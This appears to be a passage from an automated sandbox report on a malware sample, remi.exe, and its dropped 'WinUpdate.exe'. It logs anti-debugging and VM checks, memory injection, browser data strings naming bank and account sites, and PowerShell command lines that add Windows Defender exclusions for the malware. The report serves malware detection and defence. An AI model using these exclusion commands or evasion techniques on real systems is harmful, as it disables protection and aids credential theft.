                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: remi.exe PID: 4372, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: WinUpdate.exe PID: 4836, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0040E54F Sleep,ExitProcess,6_2_0040E54F
                    Source: C:\Users\user\Desktop\remi.exeMemory allocated: 1610000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeMemory allocated: 3260000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeMemory allocated: 3090000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeMemory allocated: 81E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeMemory allocated: 91E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeMemory allocated: 9390000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeMemory allocated: A390000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMemory allocated: AF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMemory allocated: 2590000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMemory allocated: 4590000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMemory allocated: 70D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMemory allocated: 80D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMemory allocated: 8270000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMemory allocated: 9270000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMemory allocated: 11F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMemory allocated: 2B80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMemory allocated: 4B80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMemory allocated: 7680000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMemory allocated: 8680000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMemory allocated: 8820000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMemory allocated: 9820000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMemory allocated: 2AF0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMemory allocated: 2D70000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMemory allocated: 2AF0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMemory allocated: 77E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMemory allocated: 87E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMemory allocated: 8980000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMemory allocated: 9980000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                    Source: C:\Users\user\Desktop\remi.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,6_2_004198C2
                    Source: C:\Users\user\Desktop\remi.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5198Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2019Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4128Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 785Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeWindow / User API: threadDelayed 9446Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeWindow / User API: foregroundWindowGot 1754Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_11-22332
                    Source: C:\Users\user\Desktop\remi.exeEvaded block: after key decisiongraph_6-47446
                    Source: C:\Users\user\Desktop\remi.exeEvaded block: after key decisiongraph_6-47417
                    Source: C:\Users\user\Desktop\remi.exeAPI coverage: 5.5 %
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeAPI coverage: 9.7 %
                    Source: C:\Users\user\Desktop\remi.exe TID: 6036Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2444Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2896Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe TID: 1812Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3184Thread sleep count: 4128 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6112Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3428Thread sleep count: 785 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2328Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe TID: 6488Thread sleep count: 140 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe TID: 6488Thread sleep time: -70000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe TID: 3664Thread sleep count: 111 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe TID: 3664Thread sleep time: -333000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe TID: 2836Thread sleep count: 35 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe TID: 3664Thread sleep count: 9446 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe TID: 3664Thread sleep time: -28338000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe TID: 7700Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe TID: 6712Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,6_2_0040B335
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,6_2_0041B42F
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,6_2_0040B53A
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0044D5E9 FindFirstFileExA,6_2_0044D5E9
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,6_2_004089A9
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00406AC2 FindFirstFileW,FindNextFileW,6_2_00406AC2
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,6_2_00407A8C
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,6_2_00418C69
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,6_2_00408DA7
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_02E610F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_02E610F1
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_02E66580 FindFirstFileExA,11_2_02E66580
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_10005C00 FindFirstFileW,FindNextFileW,FindNextFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,11_2_10005C00
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_10007E20 Sleep,FindFirstFileW,RemoveDirectoryW,FindNextFileW,RemoveDirectoryW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_10007E20
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_10018AD0 FindFirstFileExA,11_2_10018AD0
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_100073F0 FindFirstFileW,FindNextFileW,CreateFileW,FindNextFileW,FindClose,CloseHandle,FindClose,11_2_100073F0
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407EF8
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407898
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,6_2_00406F06
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_00418981 memset,GetSystemInfo,15_2_00418981
                    Source: C:\Users\user\Desktop\remi.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeThread delayed: delay time: 922337203685477
                    Source: Web Data.25.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                    Source: Web Data.25.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                    Source: Web Data.25.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                    Source: Web Data.25.drBinary or memory string: discord.comVMware20,11696487552f
                    Source: Web Data.25.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                    Source: Web Data.25.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                    Source: WinUpdate.exe, 0000000B.00000002.4584113854.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, WinUpdate.exe, 0000000B.00000002.4586847438.0000000000E18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Web Data.25.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                    Source: Web Data.25.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                    Source: Web Data.25.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                    Source: Web Data.25.drBinary or memory string: global block list test formVMware20,11696487552
                    Source: Web Data.25.drBinary or memory string: tasks.office.comVMware20,11696487552o
                    Source: Web Data.25.drBinary or memory string: AMC password management pageVMware20,11696487552
                    Source: msedge.exe, 00000017.00000002.2393020478.000001888BC5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: Web Data.25.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                    Source: Web Data.25.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                    Source: Web Data.25.drBinary or memory string: dev.azure.comVMware20,11696487552j
                    Source: Web Data.25.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                    Source: Web Data.25.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                    Source: remi.exe, 00000006.00000002.2134015358.00000000012F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: Web Data.25.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                    Source: Web Data.25.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                    Source: Web Data.25.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                    Source: Web Data.25.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                    Source: Web Data.25.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                    Source: Web Data.25.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                    Source: Web Data.25.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                    Source: Web Data.25.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                    Source: Web Data.25.drBinary or memory string: outlook.office.comVMware20,11696487552s
                    Source: Web Data.25.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                    Source: Web Data.25.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                    Source: Web Data.25.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                    Source: Web Data.25.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                    Source: Web Data.25.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\Desktop\remi.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0043A65D
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,6_2_0041BCE3
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00442554 mov eax, dword ptr fs:[00000030h]6_2_00442554
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_02E64AB4 mov eax, dword ptr fs:[00000030h]11_2_02E64AB4
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_10014BBC mov eax, dword ptr fs:[00000030h]11_2_10014BBC
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0044E92E GetProcessHeap,6_2_0044E92E
                    Source: C:\Users\user\Desktop\remi.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00434168
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0043A65D
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00433B44
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00433CD7 SetUnhandledExceptionFilter,6_2_00433CD7
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_02E62639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_02E62639
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_02E62B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_02E62B1C
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_02E660E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_02E660E2
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_1000D8D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1000D8D1
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_1000B299 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_1000B299
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_1000AFD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1000AFD4
                    Source: C:\Users\user\Desktop\remi.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\remi.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\remi.exe"
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                    Source: C:\Users\user\Desktop\remi.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\remi.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\remi.exeMemory written: C:\Users\user\Desktop\remi.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMemory written: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMemory written: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe base: 400000 value starts with: 4D5A
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonly
                    Source: C:\Users\user\Desktop\remi.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe6_2_00410F36
